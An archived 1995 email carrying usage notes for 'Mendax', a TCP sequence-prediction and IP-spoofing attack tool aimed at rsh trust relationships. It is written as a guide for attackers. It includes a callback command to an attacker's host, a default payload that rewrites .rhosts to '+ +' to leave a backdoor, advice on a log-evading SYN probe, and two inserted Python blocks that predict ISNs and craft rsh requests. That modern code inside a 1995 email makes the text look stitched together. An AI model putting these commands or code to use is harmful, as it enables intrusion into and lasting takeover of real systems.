From chewy.wookie.net!olphart Wed Jun 14 13:56:09 1995
Return-Path: <olphart@chewy.wookie.net>
Received: from chewy.wookie.net by cast.cast.uark.edu with smtp
	(Smail3.1.28.1 #5) id m0sLxbk-0007Q5C; Wed, 14 Jun 95 13:56 CDT
Received: (from olphart@localhost) by chewy.wookie.net (8.6.10/8.6.10) id NAA06470 for amandi@cast.uark.edu; Wed, 14 Jun 1995 13:54:59 -0400
Date: Wed, 14 Jun 1995 13:54:59 -0400
From: Golden Age Fuck <olphart@chewy.wookie.net>
Message-Id: <199506141754.NAA06470@chewy.wookie.net>
To: amandi@cast.uark.edu
Status: RO

Mendax v1.3
-----------
95/14/06

TCP sequence number prediction made easy.

Some people bitched about my not writing any docs... :)
(You know who you are!)
So I wrote up a quick overview of the most useful and not
totally self-explanatory options :

-w PORT		waits for a TCP packet on the given port.
		Useful if you want to know whether your
		attack succeeded: spoof.me's replies go to
		trusted.site, not to you, so the only thing
		you ever see is a connection the command
		makes back to your host.
		EXAMPLE:
		mendax -w 31337 -c "telnet your.site 31337" \
		trusted.site spoof.me

		NOTE: For best results use numeric addresses
		      for your.site, so the command does not
		      depend on name resolution on spoof.me.


-t		Test whether any gateways/routers/firewalls
		on the route to spoof.me are filtering your
		spoofed IP packets. Although this option is
		rather sloppily implemented, it should give
		you a correct answer most of the time.
		For this option you first have to find a
		host on the local subnet of trusted.site
		that is down or not connected (a host that
		is up would answer spoof.me's replies with a
		RST and give the game away). You can easily
		test that by sending an ICMP echo request (ping!).
		Of course you're fucked if any of the gateways
		between you and trusted.site filters ICMP echoes
		to all but a few hosts... :( But then you can
		also assume that they did their homework
		correctly (a gateway that filters ICMP most
		likely also filters IP packets arriving from
		outside with source addresses of inside hosts).
		One could of course just launch a denial-of-service
		attack on some host on trusted.site's subnet to
		find out. I don't advise this method
		though. You'd draw way too much attention to yourself.


-P PORT		allows you to find out whether a service on a
		certain port is running or not without leaving
		any wrapper/connect logging entries.
		Basically just sends a SYN packet, waits for
		a reply and then just resets. The handshake is
		never completed, so the daemon (and tcp_wrapper
		in front of it) never sees a connection.
		Stupid option, but useful.
		(note the warning given below)

		EXAMPLE (find out whether site is running rshd):
		mendax -P 514 target.site


-c STRING	execute the given command on spoof.me.
		The default command being executed is :
		"mv .rhosts .r; echo + + > .rhosts"
		which keeps a copy of the account's old .rhosts
		and replaces it with a "+ +" entry, i.e. from then
		on rshd/rlogind trust any user from any host for
		that account and you can rsh in normally, without
		spoofing again.

				
-S PORT		Enables you to use a port for TCP sequence number
		sampling that is different from the port your
		targeted service is running on. Any port that
		answers a SYN will do, since the ISN generator is
		per host, not per port. Works quite
		effectively on some firewall setups :)
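To make -P and -S concrete, here is an added example in Python. It is not Mendax code and is not part of this distribution: it builds and parses bare TCP headers in memory (nothing is sent; checksums are left zero), and both reply sets are constructed by hand, one imitating the 4.3BSD generator that bumps the ISN by 128000 every second and by 64000 for every connection, the other with random values. The least-squares fit and the "tolerance" of candidate guesses are my assumptions about how one would judge a host; only the option names come from this doc.

```python
"""Added example, not Mendax code: ISN sampling from half-open connections (-P)
and linear prediction of the next ISN (-S).  Headers are built and parsed locally;
the sample ISNs below are constructed, not captured."""
import struct

TCP_SYN, TCP_RST, TCP_ACK = 0x02, 0x04, 0x10
MASK32 = 0xFFFFFFFF


def build_tcp(sport, dport, seq, ack, flags, window=4096):
    """20-byte TCP header, no options.  Checksum is left zero: a real sender
    fills it in over the IP pseudo-header, which is out of scope here."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)


def parse_tcp(hdr):
    sport, dport, seq, ack, _off, flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", hdr[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags}


def classify_reply(hdr):
    """-P: a SYN/ACK means the port is listening, a RST means it is closed.
    The handshake is never completed, so nothing reaches the daemon."""
    f = parse_tcp(hdr)["flags"]
    if f & TCP_SYN and f & TCP_ACK:
        return "open"
    if f & TCP_RST:
        return "closed"
    return "unknown"


def quiet_reset(reply):
    """-P: the RST that tears the half-open connection down.  Its sequence
    number is the ack number the server expects, so the server accepts it."""
    p = parse_tcp(reply)
    return build_tcp(p["dport"], p["sport"], seq=p["ack"], ack=0, flags=TCP_RST)


def isns_from_replies(replies):
    """-S: sampling is just reading the seq field of each SYN/ACK we provoke on
    the sampling port.  replies is a list of (seconds, header) in arrival order."""
    return [(t, parse_tcp(h)["seq"]) for t, h in replies if classify_reply(h) == "open"]


def signed_delta(a, b):
    """Difference of two 32-bit sequence numbers, allowing for wrap-around."""
    d = (b - a) & MASK32
    return d - 2**32 if d > 2**31 else d


def predict_isn(samples, t_next, tolerance=256):
    """Fit isn_delta = rate * t_delta + per_connection over consecutive samples
    (ordinary least squares, two unknowns) and extrapolate to a connection opened
    at t_next.  'tolerance' (assumed) is how many candidate ack values an attacker
    is willing to try; a fit that misses by more is reported as unpredictable."""
    xs = [t1 - t0 for (t0, _), (t1, _) in zip(samples, samples[1:])]
    ys = [signed_delta(s0, s1) for (_, s0), (_, s1) in zip(samples, samples[1:])]
    mx, my = sum(xs) / len(xs), sum(ys) / len(ys)
    var = sum((x - mx) ** 2 for x in xs)
    if var == 0:
        raise ValueError("need samples with differing gaps between connections")
    rate = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / var
    per_conn = my - rate * mx
    worst = max(abs(y - (rate * x + per_conn)) for x, y in zip(xs, ys))
    t_last, isn_last = samples[-1]
    guess = int(round(isn_last + rate * (t_next - t_last) + per_conn)) & MASK32
    return {"isn": guess, "rate": rate, "per_conn": per_conn,
            "worst_residual": worst, "predictable": worst <= tolerance}


# Constructed SYN/ACKs from a 4.3BSD-style host: ISN advances 128000 per second
# and 64000 per connection.  Times are seconds since the first probe.
BSD_REPLIES = [(t, build_tcp(514, 1023, isn, 1, TCP_SYN | TCP_ACK)) for t, isn in
               [(0.0, 1000000), (0.25, 1096000), (0.75, 1224000), (1.5, 1384000), (2.5, 1576000)]]
# Constructed SYN/ACKs from a host picking ISNs at random (values chosen by hand).
RANDOM_REPLIES = [(t, build_tcp(514, 1023, isn, 1, TCP_SYN | TCP_ACK)) for t, isn in
                  [(0.0, 0x8F3A21C4), (0.25, 0x1D77B0E9), (0.75, 0xC40912AA),
                   (1.5, 0x5A1E8F03), (2.5, 0x9B66D2F1)]]

if __name__ == "__main__":
    for name, replies in (("bsd", BSD_REPLIES), ("random", RANDOM_REPLIES)):
        print(name, predict_isn(isns_from_replies(replies), t_next=3.0))
```

Run it and the 4.3BSD-style host's next ISN comes out to the number, while the fit for the random host misses by hundreds of millions: that difference is the whole attack, and it is why the target's ISN generator, not its firewall, decides whether -S gets you anywhere.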


-r USER		specify remote user: the account on spoof.me
		the command runs as. default user is root.


-l USER		specify local user: the name the spoofed
		connection claims to come from on trusted.site,
		which spoof.me checks against the remote user's
		.rhosts. default user is root.
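To show what -c, -l and -r actually put on the wire once the spoofed connection is up, an added example in Python (again not Mendax code): the rcmd request as rshd reads it, with the field order from rcmd(3)/rshd(8) (client-side user first, server account second), and a deliberately simplified .rhosts check. The simplifications are mine: no netgroups, no "-" deny entries, no /etc/hosts.equiv, and the stderr port is always 0. The two .rhosts contents are constructed to show the before and after of the default command.

```python
"""Added example, not Mendax code: the rsh request behind -c/-l/-r as rshd
decodes it, plus a simplified ruserok()-style .rhosts check (assumptions:
no netgroups, no '-' entries, no /etc/hosts.equiv, stderr port always 0)."""

RESERVED_PORTS = range(512, 1024)   # rcmd clients must come from one of these
DEFAULT_COMMAND = "mv .rhosts .r; echo + + > .rhosts"   # the -c default from this doc


def rsh_request(command=DEFAULT_COMMAND, local_user="root", remote_user="root", stderr_port=0):
    """Client side.  rcmd sends four NUL-terminated strings: stderr port,
    user on the client host (-l), account on the server (-r), command (-c)."""
    fields = [str(stderr_port), local_user, remote_user, command]
    return b"".join(f.encode() + b"\0" for f in fields)


def rshd_parse(data):
    """Server side of the same bytes: rshd reads up to each NUL."""
    fields = data.split(b"\0")
    if len(fields) != 5 or fields[4] != b"":
        raise ValueError("malformed rsh request")
    port, client_user, server_user, command = (f.decode() for f in fields[:4])
    return {"stderr_port": int(port), "client_user": client_user,
            "server_user": server_user, "command": command}


def rhosts_allows(rhosts_text, client_host, client_user, server_user):
    """Simplified .rhosts match: one 'host [user]' entry per line, '+' wildcards
    either field; a missing user field means the remote user name must equal
    the local account name."""
    for line in rhosts_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        host_ok = fields[0] in ("+", client_host)
        if len(fields) == 1:
            user_ok = client_user == server_user
        else:
            user_ok = fields[1] in ("+", client_user)
        if host_ok and user_ok:
            return True
    return False


def rshd_reply(data, client_host, client_port, rhosts_text):
    """What rshd answers: a single NUL byte on success, or 0x01 plus an error
    line.  A client port outside the reserved range is dropped before anything
    is read (modelled here as None)."""
    if client_port not in RESERVED_PORTS:
        return None
    req = rshd_parse(data)
    if not rhosts_allows(rhosts_text, client_host, req["client_user"], req["server_user"]):
        return b"\x01Permission denied.\n"
    return b"\x00"


# Constructed .rhosts contents for the root account on spoof.me, before and
# after the default command has run.
RHOSTS_BEFORE = "trusted.site root\n"
RHOSTS_AFTER = "+ +\n"

if __name__ == "__main__":
    req = rsh_request()
    print(req)
    print("as trusted.site, before:", rshd_reply(req, "trusted.site", 1023, RHOSTS_BEFORE))
    print("as anyone, before:     ", rshd_reply(req, "anywhere.example", 1023, RHOSTS_BEFORE))
    print("as anyone, after:      ", rshd_reply(req, "anywhere.example", 1023, RHOSTS_AFTER))
```

The point of the three printed lines: before the command runs, only a connection that looks like root@trusted.site gets the NUL byte back, which is exactly what the spoofing buys you; after it, the "+ +" entry hands the same NUL to anyone, so the second visit needs no prediction at all.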


